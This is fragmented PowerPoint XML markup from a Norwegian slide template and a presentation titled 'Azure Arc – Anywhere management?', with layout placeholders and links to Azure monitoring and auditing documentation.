                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sammendrag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D59B7C6-0269-4CE4-9DE3-5D7148747FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7601424" y="2372342"/>
            <a:ext cx="3276000" cy="40680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nb-NO" sz="1400" b="1" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Utvalgte oppdrag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2DDA465-FE9D-4F3E-AF97-8E0EB42A26AE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D0DED3A0-C445-4088-82E7-EC5510F00358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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22240040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to kolo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28CD9CB-64AE-4142-B9D0-A0B3F0E38A8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 err="1"/>
              <a:t>Farge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" noProof="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" noProof="0" err="1"/>
              <a:t>på</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" noProof="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" noProof="0" err="1"/>
              <a:t>tekst</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200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7F0FA2-A62C-4000-AC8B-58F406A03B28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01C8FDB5-0EFF-475D-BD37-7B05D1D32CA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20183" y="1587610"/>
            <a:ext cx="5045778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93566672-3E66-46F9-901C-90BDEABCD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4863" y="1587610"/>
            <a:ext cx="5045778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22785923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k rø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-8019"/>
            <a:ext cx="11473200" cy="6113615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="accent2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="EF7D00"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000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nb-NO" noProof="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="ZoneTexte 17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2A05F2E9-0514-4CF2-B6ED-CD31C493C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623" y="1706796"/>
            <a:ext cx="7806811" cy="612000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle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nb-NO" noProof="0"/>
              <a:t>Tusen takk.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8832A72E-DA14-460B-8E61-E5027E89EF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719138" y="2512219"/>
            <a:ext cx="721518" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/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35036-1AD0-45B1-AF7D-4CEBE3CD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931" y="3290094"/>
            <a:ext cx="2844000" cy="1080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Tekst – Tahoma 8pt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132799607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kk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ZoneTexte 17"/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Farge på tekst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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A05F2E9-0514-4CF2-B6ED-CD31C493C1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8624" y="1706796"/>
            <a:ext cx="4080298" cy="612000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="32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nb-NO" noProof="0"/>
              <a:t>Tusen takk.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Connecteur droit 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8832A72E-DA14-460B-8E61-E5027E89EF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719138" y="2512219"/>
            <a:ext cx="721518" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line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miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr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35036-1AD0-45B1-AF7D-4CEBE3CD396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9931" y="3290094"/>
            <a:ext cx="2844000" cy="1080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2">
                    <a:lumMod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nb-NO" noProof="0"/>
              <a:t>Tekst – Tahoma 8pt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="A person standing next to a lake&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE1FBA9F-D6C7-4ACD-BA48-F0CD84A3CF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3211" t="19287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1006828"/>
            <a:ext cx="4544736" cy="456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46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akk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615469A-3F47-4DE9-913B-7AF0B899C3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07530" y="3163137"/>
            <a:ext cx="4176941" cy="531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57928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4A9F7-26C5-4694-A296-7076D5CEB33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1587610"/>
            <a:ext cx="10749412" cy="4538931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Text – Tahoma 18pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Title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330B3B81-CB18-49F2-A0E3-637EFF665D98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noProof="0"/>
              <a:t>Color of text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6BF4AE-C967-4346-99C5-1B876420959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sz="1697" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1992418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53E02-78AA-45A2-8F02-8A9B02F5D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027F2-08CC-48A4-B728-35D9DFCDF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017FA-0739-4346-8E3D-C68296869A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C6FB1-57CB-49BF-9051-1A481E52E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CA369-7283-42ED-9831-23C786076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3282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A2F87-2164-4C29-8493-FF8BE539B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C174F-DA37-4A62-833E-46BBA7AD7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AB38-E525-4BA2-85D4-04A78D450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CF412-E98A-4CBD-A698-55B45CE30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FD9C6-9728-4605-BD97-9B34F9D5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50219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613C2-73BF-4B14-B574-8975A1E61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883157-8924-42E0-BFFD-6A906D691D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9F00F-1DF5-484D-B896-7E80AF3F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3777E-A7D1-4100-99B7-1D4DB5EF1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7A97B-867B-415E-A7CB-DA3DEADBF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2890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D84A8-C94C-40CD-8931-25FE22241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C2F37-0E72-4722-92AE-80F13E4CAB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E56BEA-6FF7-45A5-BB8F-31DE2DD66E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852DC9-9726-4562-80B7-B37A3D1E6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74516-099C-46A5-A7DE-EBCDCDD1A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908467-33EC-4447-A325-705211C9B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14929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4A08E-1D72-4ED0-B302-AB913ABC5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71BE5-2546-4E68-AA1F-EE5910D6A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1B784A-0527-4040-B653-E3B6BBFE9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37DEB1-FB8C-4C50-B0D0-3C924F2A85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91191A-04B1-481A-89ED-413A2B4FED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ADE7DF-E094-4E75-842A-A76932584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2A552F-E5BD-4911-944D-8B9C155A0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79C03-9DAE-448B-BBDD-8BFA4B643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47385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479D9-42BE-41DE-8D6A-EF2F1F77A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B4E435-02C4-48E4-BE66-D7C06F730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83D60F-49D8-4326-B5B4-D49A1156C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D6860-6425-4C1C-B0E6-89F9E16D3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50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vide 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Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FDEB22A-472A-4EFB-9D37-3E885FC987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19136" y="1754629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0BD8886C-CD28-4C7E-A1D0-02B60479D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9136" y="2819334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4" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6531A9-C880-4BD2-88DC-96E543E74F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19136" y="3884039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F48F2751-73E5-40F9-B8DB-AA7625E8B28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136" y="4948744"/>
            <a:ext cx="10751504" cy="8640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 – Tahoma 16 pt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73036D70-EB21-4AB7-8369-7D1109B84DBB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9A3DB6-4365-4ADE-9B67-BF3AF96E81E1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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="501149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9AC0B4-3005-44F1-B92D-CF1BAB5AC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6BD583-3643-4A4E-ABEB-406C1EF6C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67E524-D968-484F-9829-AA1B5146F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13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047AB-A82B-4217-A766-147215C82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F677E-52BF-4050-B265-2439E9A163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1736F6-3390-4C40-8324-B45CCC7BB2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0A0E42-8D58-441D-B012-4042C6CCC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BF06F-2CDB-4CB4-A204-DA1A5B170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6CC07-848C-4D1A-A9C7-759C59437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831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98B09-38A4-47E2-A4EE-C8718458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9F0017-D44D-48EC-9213-4D9C27887D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0EBF34-256B-4781-B52A-4BCB3DAAE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54753-21FE-470F-9752-529316C73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4B268-6036-48C1-8833-F392437F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E8991E-E7C1-4691-8ACE-CB488D900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623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4EED-EB8B-4D82-8818-9CE806DDB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A8743-2252-4170-B537-09EBD94613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C0A2C-D19E-4CCA-82E3-DD179B690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24CD2-033D-400B-94B3-7168E93FF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8366BF-6B63-4F32-9FEA-39F983B29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2714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FDD0B1-D849-403E-B15C-DC1930A49A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3F8B47-0BFC-42B3-ACA0-DC562F09A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AA995-9274-49F6-86E8-6FC1EBF20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DB8CB-3627-4A98-9237-97B633CEE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89BAB-D622-4B68-A4F6-4CBAF7F2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62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iko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9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FDEB22A-472A-4EFB-9D37-3E885FC987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3955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0" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD8886C-CD28-4C7E-A1D0-02B60479D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3010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4" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6531A9-C880-4BD2-88DC-96E543E74F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64899" y="3897727"/>
            <a:ext cx="2702257" cy="162529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8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13" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B63F56F-903A-4270-A9B5-96A8437CCCC0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7B50B3-78D9-4804-90E1-0DBFB1B0DE5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E44C25-DC6F-4E76-BA3E-745C0EEA4539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1937469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2D28B304-042B-4EC3-B8BD-9A9684FC2691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348414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458896F-4266-4991-A883-A25E4AE97C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8759358" y="2180422"/>
            <a:ext cx="1513338" cy="1513338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200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Sett inn ikon eller bilde her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34825210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tre boks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titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4B0183-D6C8-4580-9610-C59C2EF430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3" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD24E80-FF30-4979-B949-8C09A7A86D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3954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5" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1588D626-9C84-4BCC-86F1-DDEB8D80ED1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343010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6" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6CFC49-7594-417E-AA82-64CBD29D02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4899" y="2178440"/>
            <a:ext cx="2702257" cy="461296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500" b="1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Undertittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9D41F4-7489-437A-A64A-09E40D9D041C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97CA3E-A8C8-4F8D-9499-EA5828150E5A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20" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D9EFA5-A170-4F71-A665-B7CAF248D4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53955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1" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11ADE2FD-730B-41A0-B0A8-691DB7CBCD0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43010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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6EF679-9EAE-456F-9AA1-C25419ECCDE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164899" y="2719137"/>
            <a:ext cx="2702257" cy="2803880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500" b="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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tekst</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9179205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1/2 gr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itre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F011C0E-0C4A-4057-BB1D-C512D97D4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9137" y="739140"/>
            <a:ext cx="4654968" cy="102549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C2028A8-DDDF-417A-9AC4-705DEE47DE29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noProof="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91B963FF-5BA8-4B1C-8F77-75057C5857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9F534058-EEEB-4AD1-9139-1380907E4B60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B87282-3191-405E-89F7-08B13818FBCA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6C11D9C6-AFBD-4E90-B330-3AFBFE0656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0183" y="2052084"/>
            <a:ext cx="4653922" cy="4074456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1710306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sett inn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titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F011C0E-0C4A-4057-BB1D-C512D97D47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16516" y="739140"/>
            <a:ext cx="4654968" cy="102549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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Tittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé pour une image  2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1497C9C0-21CA-4A38-91B6-677370471E24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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noProof="0"/>
              <a:t>Klikk på ikonet for å legge til bilde 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920C92E-BE9C-4F02-905B-42F0B7ED3391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252000" y="-384054"/>
            <a:ext cx="40802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noProof="0"/>
              <a:t>Farge på tekst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4835D3-F912-41CC-9971-B9D5FD7E065E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-374907"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4949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97" noProof="0"/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F0C88A4F-4E14-4194-9E8A-ABBD04A94F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23291" y="2052084"/>
            <a:ext cx="4653922" cy="4074456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="75600" tIns="75600" rIns="75600" bIns="75600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265113" indent="-265113">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="541338" indent="-276225">
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="876768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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png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4.xml"/><Relationship Id="rId5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53.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout47.xml"/><Relationship Id="rId9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F798E53-107F-468D-A86A-B9E27C8FB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nb-NO" noProof="0"/>
              <a:t>Tittel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3116353-A2DB-400D-836D-10B770C82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137" y="1662545"/>
            <a:ext cx="10751504" cy="445631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Tekst – Tahoma 18pt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		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="nb-NO" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="nb-NO" noProof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4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9532" y="6268043"/>
            <a:ext cx="1587153" cy="39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52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72" r:id="rId2"/>
    <p:sldLayoutId id="2147483773" r:id="rId3"/>
    <p:sldLayoutId id="2147483743" r:id="rId4"/>
    <p:sldLayoutId id="2147483740" r:id="rId5"/>
    <p:sldLayoutId id="2147483741" r:id="rId6"/>
    <p:sldLayoutId id="2147483760" r:id="rId7"/>
    <p:sldLayoutId id="2147483709" r:id="rId8"/>
    <p:sldLayoutId id="2147483739" r:id="rId9"/>
    <p:sldLayoutId id="2147483746" r:id="rId10"/>
    <p:sldLayoutId id="2147483730" r:id="rId11"/>
    <p:sldLayoutId id="2147483731" r:id="rId12"/>
    <p:sldLayoutId id="2147483732" r:id="rId13"/>
    <p:sldLayoutId id="2147483761" r:id="rId14"/>
    <p:sldLayoutId id="2147483735" r:id="rId15"/>
    <p:sldLayoutId id="2147483769" r:id="rId16"/>
    <p:sldLayoutId id="2147483770" r:id="rId17"/>
    <p:sldLayoutId id="2147483738" r:id="rId18"/>
    <p:sldLayoutId id="2147483737" r:id="rId19"/>
    <p:sldLayoutId id="2147483706" r:id="rId20"/>
    <p:sldLayoutId id="2147483779" r:id="rId21"/>
    <p:sldLayoutId id="2147483707" r:id="rId22"/>
    <p:sldLayoutId id="2147483771" r:id="rId23"/>
    <p:sldLayoutId id="2147483667" r:id="rId24"/>
    <p:sldLayoutId id="2147483671" r:id="rId25"/>
    <p:sldLayoutId id="2147483669" r:id="rId26"/>
    <p:sldLayoutId id="2147483673" r:id="rId27"/>
    <p:sldLayoutId id="2147483668" r:id="rId28"/>
    <p:sldLayoutId id="2147483756" r:id="rId29"/>
    <p:sldLayoutId id="2147483765" r:id="rId30"/>
    <p:sldLayoutId id="2147483766" r:id="rId31"/>
    <p:sldLayoutId id="2147483767" r:id="rId32"/>
    <p:sldLayoutId id="2147483690" r:id="rId33"/>
    <p:sldLayoutId id="2147483689" r:id="rId34"/>
    <p:sldLayoutId id="2147483713" r:id="rId35"/>
    <p:sldLayoutId id="2147483717" r:id="rId36"/>
    <p:sldLayoutId id="2147483718" r:id="rId37"/>
    <p:sldLayoutId id="2147483751" r:id="rId38"/>
    <p:sldLayoutId id="2147483758" r:id="rId39"/>
    <p:sldLayoutId id="2147483768" r:id="rId40"/>
    <p:sldLayoutId id="2147483777" r:id="rId41"/>
    <p:sldLayoutId id="2147483778" r:id="rId42"/>
    <p:sldLayoutId id="2147483780" r:id="rId4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ts val="60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5600" indent="-35560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100000"/>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" b="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1pPr>
      <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400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b="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004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="14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065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buSzPct val="80000"/>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="12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1980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CCFB66-6782-4708-B7AF-8C6C3BA0B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F6024-7DCC-4100-8609-1AF420D253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FF9A5-CC9E-43A8-A33B-9DC4F9B15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AA136-6D25-45FC-8152-63C171252AAF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7E542-9A4B-4D66-8606-C1A16AF2C5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22F54-285A-422E-A5D8-6CD6F42D90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A069DC-8073-466F-BA53-E8D00F7FD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0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sandbu.org/auditing-windows-file-servers-with-azure-sentinel-log-analytics/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emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId4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zure/azure-arc/servers/policy-reference?source=recommendations" TargetMode="External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emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.emf"/><Relationship Id="rId9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hyperlink" Target="https://azurearcjumpstart.io/azure_jumpstart_arcbox/ful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mailto:msandbu@gmail.com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techcommunity.microsoft.com/t5/core-infrastructure-and-security/azure-monitor-alert-notification-via-teams/ba-p/250767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learn.microsoft.com/en-us/azure/azure-monitor/agents/agents-overview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0962-9E1E-433B-965E-432F2562A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5467"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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Azure Arc – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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nb-NO" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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Anywhere management?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Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056430C3-5002-CFD0-E511-905C1324F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1059" y="2572011"/>
            <a:ext cx="6120000" cy="954658"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
